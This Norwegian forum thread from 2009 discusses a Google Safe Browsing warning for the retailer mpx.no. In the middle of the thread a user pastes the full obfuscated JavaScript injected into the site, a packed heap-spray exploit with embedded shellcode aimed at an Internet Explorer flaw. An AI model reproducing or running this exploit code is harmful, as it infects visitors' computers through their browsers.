MPX.NO gir deg trojanere?

[Theo343]

Får dette når jeg forsøker å gå inn på MPX sine sider nå.

 

Safe Browsing

Diagnostic page for mpx.no

 

What is the current listing status for mpx.no?

 

Site is listed as suspicious - visiting this web site may harm your computer.

 

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

 

What happened when Google visited this site?

 

Of the 22 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-02-21, and the last time suspicious content was found on this site was on 2009-02-20.

 

Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 6 new processes on the target machine.

 

Malicious software is hosted on 1 domain(s), including luckffxi.com/.

 

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including me9x.cn/.

 

This site was hosted on 3 network(s) including AS2119 (TELENOR), AS41572 (HAFSLUND), AS15659 (NEXTGENTEL).

 

Has this site acted as an intermediary resulting in further distribution of malware?

 

Over the past 90 days, mpx.no did not appear to function as an intermediary for the infection of any sites.

 

Has this site hosted malware?

 

No, this site has not hosted malicious software over the past 90 days.

 

How did this happen?

 

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

 

Ikke betryggende iom. at man benytter kredittkort her.

Endret 21. februar 2009 av Theo343

[reichspöbel]

Fikk akkurat denne selv på en db.no artikkel. Enten er det noe galt med Google Chromes phishing-filter, eller så har MPX blitt infisert av noe.

 

Mer informasjon:

http://safebrowsing.clients.google.com/saf...hrome&hl=nb

[Theo343]

Kan godt være noe galt med phising filteret men det er denne setningen i rapporten som bekymrer meg.

Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 6 new processes on the target machine.

 

Og den kina siten det henvises til gjør ikke saken meg betryggende hehe.

Endret 21. februar 2009 av Theo343

[Sovende Panda]

Sjekk denne tråden: https://www.diskusjon.no/index.php?showtopic=1077799

[reichspöbel]

Enig. Men jeg stusser på at vi begge fikk den akkurat nå, når det skal ha blitt oppdaget i går.

Endret 21. februar 2009 av rikspøbel

[reichspöbel]

Sjekk denne tråden: https://www.diskusjon.no/index.php?showtopic=1077799

Da er det nok ikke noe galt med phishing filteret...

[Theo343]

Ja sett litt på dette og siden har helt klart fått inn noe grums som bør fjernes.

Avira free som jeg bruker reagerte på dette den og.

 

Virustotal er bare Microsoft som finner noe.

Microsoft 1.4306 2009.02.20 Exploit:JS/MS09002.A

 

Ser vi på kildekoden som blir kjørt er det et JavaScript.

Her er Regular expression brukt på en kreativ måte.

Og som norbat sier leder dette til en 'kinesisk' side.

 

<script language="JavaScript">eval(function(p,a,c,k,e,d){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1 5L=3("%5r%2r%2n");1 58=3("%5n%2d%5i%1N");1 5C=3("%5e%5f%53%59");1 57=3("%5H%5N%4x%4p");1 4n=3("%4q%37%4Q%4P");1 4A=3("%37%4W%4V%4M");1 34=3("%72%6u%6t%6v%6w%6x%6s%6r%6n%6m%2d%6o%6p%6q%6y%2r%2n%4");1 35=3("%6%6H%5%6I");1 36=3("%6J%6K%j%6G");1 32=3("%6F%2i%e%6B");1 31=3("%6A%6C%6D%e");1 2X=3("%6E%6l%6k%62");1 30=3("%61%63%64%65");1 38=3("%60%5Z%5V%5U");1 39=3("%2o%5W%1z%5X");1 3i=3("%2i%5Y%66%67");1 3h=3("%e%6g%e%6f");1 3k=3("%6h%6i%6j%6e");1 3l=3("%1P%6d%69%68");1 3g=3("%6a%e%6b%6c");1 3f=3("%6L%6M%p%7n");1 3b=3("%7m%7o%e%7p");1 3a=3("%7q%7l%p%7k");1 3c=3("%7g%7f%p%5T");1 3d=3("%7h%4%8%7");1 3e=3("%4%7i%7j%7r");1 2U=3("%8%7%6%7s");1 2B=3("%7A%7B%2h%4");1 2A=3("%6%7C%5%7D");1 2C=3("%7z%f%7y%5");1 2D=3("%a%7u%5%7t");1 2E=3("%7v%a%7w%5");1 2z=3("%6%7x%5%7e");1 2y=3("%7d%4%8%7");1 2t=3("%4%6V%6U%6W");1 2u=3("%8%7%6%6X");1 2v=3("%6Y%6T%6S%4");1 2x=3("%6%6O%5%6N");1 2G=3("%6P%4%8%7");1 2P=3("%5%6Q%6R%6Z");1 2O=3("%8%7%6%70");1 2Q=3("%79%78%7a%4");1 2R=3("%6%7b%5%7c");1 2S=3("%77%4%8%7");1 2N=3("%5%76%71%1y");1 2M=3("%8%7%6%73");1 2I=3("%74%75%7E%4");1 2H=3("%6%5p%5%4H");1 2J=3("%4I%4%8%7");1 2K=3("%4%4J%4K%4G");1 2L=3("%8%7%6%4F");1 3m=3("%1X%1S%4B%4");1 3u=3("%6%4C%4%1R");1 41=3("%4D%9%8%7");1 4a=3("%5%4E%4L%1y");1 3X=3("%8%7%6%4T");1 3Y=3("%4U%4S%4R%9");1 48=3("%6%4O%5%4X");1 47=3("%4l%9%8%7");1 46=3("%4%4o%4k%4j");1 45=3("%8%7%6%4z");1 44=3("%1X%1S%4y%9");1 42=3("%6%4r%4%1R");1 40=3("%4t%9%8%7");1 49=3("%5%4w%4s%4u");1 4d=3("%8%7%6%4v");1 4e=3("%4m%4N%5S%9");1 4h=3("%6%5A%4%5z");1 43=3("%5B%9%8%7");1 3Z=3("%4%5D%5y%5x");1 4i=3("%8%7%6%5s");1 4f=3("%5u%5v%5w%9");1 4c=3("%6%5F%4%5O");1 4b=3("%5P%9%8%7");1 4g=3("%4%5Q%5R%5M");1 3V=3("%8%7%6%5G");1 3z=3("%5I%5J%5K%9");1 3y=3("%6%5q%4%5a");1 3x=3("%1Y%5%1D%56");1 3A=3("%9%1W%55%5");1 3B=3("%50%51%1O%5c");1 3D=3("%2k%1Q%j%25");1 3C=3("%k%v%5d%5m");1 3w=3("%m%f%u%5");1 3v=3("%a%5l%4%5o");1 3q=3("%o%a%5k%5");1 3p=3("%5j%5g%y%s");1 3o=3("%v%5h%54%l");1 3r=3("%f%u%5%k");1 3s=3("%52%4%4Z%m");1 3W=3("%a%5b%5%a");1 3t=3("%5E%y%s%o");1 3E=3("%5t%4Y%l%6z");1 3F=3("%u%5%k%v");1 3Q=3("%4%8g%m%f");1 3P=3("%9X%5%a%9Y");1 3R=3("%y%s%o%a");1 3S=3("%9Z%a0%9W%9V");1 3U=3("%1Y%5%1D%7");1 3T=3("%1M%1W%9R%5");1 3O=3("%9Q%m%1O%9S");1 3N=3("%9T%1Q%j%25");1 3I=3("%9U%4%a2%a3");1 3H=3("%ab%9%4%ac");1 3G=3("%4%d%k%ad");1 3J=3("%ae%aa%a9%a5");1 3K=3("%1P%j%a4%a6");1 3M=3("%4%d%a7%a8");1 3L=3("%1V%9P%9O%9x");1 2Z=3("%9w%9y%9z%1M");1 2m=3("%9A%9v%1N%9u");1 D=3("%9q%9p%9r%4");1 C=3("%9s%9t%l%9B");1 H=3("%9C%4%d%q");1 I=3("%9K%9L%9M%9N");1 N=3("%9J%9I%9E%q");1 M=3("%9D%9F%ag%5");1 L=3("%1U%9H%af%aq");1 1t=3("%1B%b2%4%1T");1 1s=3("%d%1C%1A%1K");1 1q=3("%4%a%aT%4");1 1r=3("%aK%n%1x%b6");1 1g=3("%1L%aP%5%aQ");1 1v=3("%4%aR%4%1V");1 1d=3("%1T%1U%1L%aS");1 1c=3("%1K%1B%aO%4");1 1e=3("%4%d%1C%1A");1 1f=3("%aN%4%a%aJ");1 1b=3("%5%1z%n%1x");1 1a=3("%aI%aM%aU%1J");1 15=3("%6%b3%5%b4");1 14=3("%b5%b1%b0%5");1 16=3("%aW%aV%aX%aY");1 17=3("%aZ%aL%aG%ap");1 19=3("%ao%aH%ar%as");1 18=3("%1F%1E%1E%d");1 1h=3("%5%f%an%4");1 1i=3("%am%4%ai%ah");1 1u=3("%4%1J%4%aj");1 1o=3("%1H%ak%a%al");1 1k=3("%4%at%7F%1H");1 1j=3("%au%aC%aD%aE");1 1l=3("%aF%1G%aB%aA");1 1m=3("%aw%av%ax%ay");1 1n=3("%1F%1G%az%9G");1 13=3("%9n%8f%8e%1Z");1 12=3("%9o%8h%8i%8d");1 K=3("%8c%88%87%89");1 J=3("%q%8a%8b%8j");1 B=3("%a%8k%4%d");1 E=3("%8s%8t%4%8u");1 G=3("%8v%8r%8q%n");1 F=3("%8m%8l%8n%8o");1 O=3("%w%8p%86%85");1 P=3("%4%7O%7N%9");1 Y=3("%7P%7Q%7R%7M");1 X=3("%7L%7H%7G%7I");1 Z=3("%7J%7K%7S%7T");1 10=3("%1Z%81%82%83");1 11=3("%84%w%80%7Z");1 W=3("%4%2g%7V%2h");1 V=3("%2e%7U%4%7W");1 R=3("%2f%7X%2j%4");1 Q=3("%4%2g%7Y%2p");1 S=3("%2e%8w%4%8x");1 T=3("%2f%96%2j%4");1 U=3("%4%2k%97%2p");1 1p=3("%g%98%4%99");1 2q=3("%4%t%95%4");1 28=3("%94%4%g%2o");1 27=3("%4%g%90%4");1 29=3("%8Z%4%t%91");1 2a=3("%4%92%4%g");1 2b=3("%2l%4%g%93");1 26=3("%f%9a%4%t");1 1w=3("%9b%d%9j%5");1 21=3("%9k%w%9l%9m");1 20=3("%4%9i%d%9h");1 22=3("%2l%9d%l%9c");1 23=3("%9e%9f%9g%8Y");1 24=3("%8X%8G%8F%8H");1 2c=3("%8I%8J%8E%8D");1 c=2c+24+23+22+20+21+1w+26+2b+2a+29+27+28+2q+1p+U+T+S+Q+R+V+W+11+10+Z+X+Y+P+O+F+G+E+B+J+K+1

+13+1n+1m+1l+1j+1k+1o+1u+1i+1h+18+19+17+16+14+15+1a+1b+1f+1e+1c+1d+1v+1g+1r+1q+1s+1t+L+M+N

I+H+C+D+2m+2Z+3L+3M+3K+3J+3G+3H+3I+3N+3O+3T+3U+3S+3R+3P+3Q+3F+3E+3t+3W+3s+3r+3o+3p+3q+3v+3

+3C+3D+3B+3A+3x+3y+3z+3V+4g+4b+4c+4f+4i+3Z+43+4h+4e+4d+49+40+42+44+45+46+47+48+3Y+3X+4a+41

3u+3m+2L+2K+2J+2H+2I+2M+2N+2S+2R+2Q+2O+2P+2G+2x+2v+2u+2t+2y+2z+2E+2D+2C+2A+2B+2U+3e+3d+3c+

a+3b+3f+3g+3l+3k+3h+3i+39+38+30+2X+31+32+36+35+34;1 2W=2Y 3j();1 z=8z-(c.A*2+8y);1 b=3("%33%33");8A(b.A<z/2){b+=b}1 2V=b.8B(0,z/2);8C b;r(i=0;i<8K;i++){2W=2V+c}2s();1 2w=3("%8L%8T");1 a1=2Y 3j();r(1 x=0;x<8U;x++)a1.8V(3n.2T("8W"));8S 8R(){h=3n.2T("8N");h.1I;1 2F=h.8M();h.8O();h=8P;2s();r(1 x=0;x<a1.A;x++)a1[x].8Q=2w;2F.1I}',62,689,'|var||unescape|ubcbc|u4343|u547f|ub478|u3fbc|ubcbd|u54ec|||u6c43|u3782|u5443|u54bc|o1|

u98f8|u783f|ud4bc|u4342|uec7c|ub898|ufc37|u4037|for|uf831|u4437|u435a|u7fb4|u37bc||ua957|l

|length|c32|c69|c70|c31|c29|c30|c68|c67|c33|c34|c64|c65|c66|c28|c27|c18|c19|c17|c16|c15|c2

|c21|c25|c26|c24|c23|c22|c35|c36|c50|c51|c49|c48|c46|c47|c52|c53|c56|c57|c55|c54|c59|c45|c

4|c40|c41|c39|c38|c37|c42|c14|c61|c60|c62|c63|c43|c58|c6|u54e8|uecbe|u8f43|u9880|u54b6|u3c

a|u3f43|uefef|u678f|u7037|uecec|click|ua554|ucbbc|u546c|ubcbe|ud693|uec43|u378a|u31a9|uc2d

|ueccf|u438f|u43eb|u43bc|u55bc|u5e64|u5a54|u7c8f|c4|c5|c3|c2|c1|uecb8|c7|c11|c12|c10|c9|c8

c0|u93d1|u54eb|ud6ef|ue4bc|u8254|u61bf|uacbc|u57bc|u8454|c71|ubcd9|ubf37|u6037|c13|uc4d9|C

llectGarbage|c147|c146|c145|s1|c144|c148|c149|c153|c154|c152|c151|c150|o2|c143|c134|c135|c

33|c132|c131|c136|c137|c141|c142|c140|c139|c138|createElement|c155|lh|array|c170|new|c72|c

69|c171|c172|u0C0C|c175|c174|c173|udf92|c168|c167|c159|c160|c158|c157|c156|c161|c162|c165|

166|Array|c164|c163|c130|document|c94|c95|c96|c93|c92|c90|c129|c97|c98|c103|c104|c105|c102

c101|c99|c100|c89|c88|c77|c78|c79|c76|c75|c73|c74|c80|c81|c86|c87|c85|c84|c82|c83|c106|c91

c126|c125|c112|c118|c128|c119|c113|c120|c121|c122|c123|c124|c117|c127|c108|c109|c116|c115|

110|c107|c114|c111|uec67|u91f5|u8654|ub836|c177|u0cd4|ud9db|ud6c8|ubd8f|u67d4|ude54|ueca0|

424b|uc4d4|uddd1|uf254|ubda3|c176|u4254|ubc5f|uae54|ue5d4|ubc73|uec89|uebd4|u5654|u22d4|u0

45|u3d2b|ud5d6|uece3|u438a|ude93|ud1d3|u9a54|ueca2|u421b|u27e2|udbd2|ud9d4|u17d4|ubc8e|u33

5|u3c54|u4341|ubd45|uccd5|ucbca|u42fc|ub878|c178|c180|uc5dd|ua7d4|u4173|u1654|ucad4|u93cf|

d0dd|ud3d8|udfd4|udfd6|ud4cf|u4119|ubd73|uc4db|ud193|ud955|u422e|ubd17|u92df|ubdd3|u8fd4|u

140|uecc0|u2254|uec8a|u53ea|u4cd4|ubde7|u3654|c179|u51d4|uced9|ubd3f|ubd2b|ucfde|ufa7a|uec

5|u7a54|c181|uecb0|ud593|u16d4|u0e54|u50d4|ubf2b|uca54|u398c|ub173|u7dbb|u8f49|u407c|u875f

uc87c|u3810|u44bf|ubf98|u4857|u878a|u98c0|u82f5|u8837|uf937|u8a98|uc07c|u80fc|udc7f|u98d0|

69bf|u9ce6|ua4f6|u8a80|ue837|uc494|ue637|u8263|ud3df|u92d5|ucacf|ud4df|ucfd3|uc4da|udad7|u

b93|u9386|ucbcb|ud092|udfc9|u92c8|ucfc9|u8261|u37b8|u37da|uf7b0|uc994|ua0e6|udda0|u47d8|uc

d4|u79bf|u358a|u577f|u82b7|ud4d4|u42fe|u2654|u2bd4|u5e75|u3a54|uec0f|u0f42|uced4|uecaa|ubc

b|u7998|uec1f|u42ea|ua2c6|uccc8|u42c2|u091c|uec07|ua6d4|u7e54|uec28|u8ce7|u1254|u42d6|u5cd

|uce54|uaf57|ud87c|u8f7f|u9654|u32d4|ub2f2|u82b0|u82ac|ucc37|u3f88|u11a0|ub4fc|uc47c|uec50

ubcb3|u0955|u4217|ud9d6|u4749|u42f8|u4354|u4340|uf353|uecb9|u4115|uf3d4|u6a54|uecef|u82bd|

e335|u7bda|u43fb|u7fe3|u8204|ub82b|ua850|u3de7|ub9fb|u5c43|u557f|u82e7|ubb7a|ube27|ueb7f|u

154|ud49c|uef7f|uf575|u8f44|u7f0c|u4e40|u3112|ubcb8|ud1df|ube7b|ubfc8|u6738|u57fc|u7b37|u7

3f|ua436|u826e|ue850|u3fbd|u0555|ubc7a|u8f9e|u82b4|ubf7f|u7b82|u9cd8|ub8fe|udf93|u8268|u8f

4|u7e3f|ud4ec|ubdb8|uefee|u9e9c|ube0f|u5954|0x01020|0x100000|while|substring|delete|u96b9|

c933|u0b34|u8000|ue2bc|u11eb|u4b5b|0xC0|u0b0b|cloneNode|tbody|clearAttributes|null|src|ok|

unction|u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA|1000|push|img|u0005|uffff|ubf61|ubdfa|u9e54|ufa54|u

df3|u8c54|ub054|ud4fc|uefe4|ubddf|ua654|ubf83|u184f|u9cbc|ubcbf|uebfa|ue805|uffea|u3a05|ub

d6|u4a54|ubcb9|u5744|ue2b9|uec34|u824a|u4837|ucefa|ub405|uddd4|ud9d1|u82bc|uc91a|uc843|ubd

7|u9c98|u9854|u4fbc|uf9f5|ubee1|ube57|ub450|u7fe4|uc1e8|ue46c|u3feb|uea43|ub4d6|u82eb|ucb4

|u54a8|u5444|u376c|u9c54|u425c|uf654|u57d1|ud2d3|ud0d8|uc8d2|u4145|ube9f|ud67f|ud4d0||uc9d

|ud0ce|u829c|ubd53|ubc43|u4487|ub4c8|u54a0|u98c8|u04e2|ud47f|ue3ac|u4382|ue3e2|u4554|udc1c

u31bc|ud8bc|uebec|ubf87|ub81d|ubf85|u843c|u2c2c|u7fe7|u3cb9|u5484|uedbc|u8fac|ua035|u82b5|

3fb4|ub87c|u443f|u7f3f|u6537|u827c|uff7b|ubd90|u4e57|u2cb9|uc855|ub8bd|ube37|u8fea|uc43d|u

e3c|ubce8|ubefd|u425a|uebef|u43d4|ubd47|ubee9|ubcb0|ue9ba|uc82c|u5037|ufc31|ub3c9|u4390|u5

5c|ubeb7|u439a|uad04|u43b9|ubca2'.split('|')))

</script><script>window.setTimeout("ok();",800);</script>

Auda..

 

Men hvor lang tid tar det før google oppdaterer seg, om MPX har fjernet dette? Må man som med RBLer selv sørge for å melde fra om en rescan?

Endret 21. februar 2009 av Theo343

[reichspöbel]

Det ser ut til at Google scanner omtrent en gang om dagen.

Endret 21. februar 2009 av rikspøbel

[Theo343]

Ok da vil dette ant. være borte i løpet av dagen eller i morgen Takker

[Lilac1]

Er det dette som kalles ekstraservice?

[Theo343]

Hva har dette med denne tråden å gjøre?

[Lilac1]

Hva har dette med denne tråden å gjøre?

 

Jeg tenkte på trojaneren, du tenkte åpenbart på signaturen min.

[Theo343]

Hehe beklager, japps.

[Anathema]

Ser dette er en litt gammel tråd, men vi prøver:

 

Denne "Mistenkt angrepsnettsted!" har kapret siden hvor jeg har mailen min. Prøver å trykke på ignorer advarsel, men den gir seg faen ikke. Hva er løsningen for å få denne uønskede "sikkerheten" vekk?

[BearCat]

Du kan kanskje prøve å bruke en usikker browser ;-)

[Anathema]

En herlig midlertidlig løsning, men jeg vil gjerne ha firefox til å leve igjen. Andre gode forslag?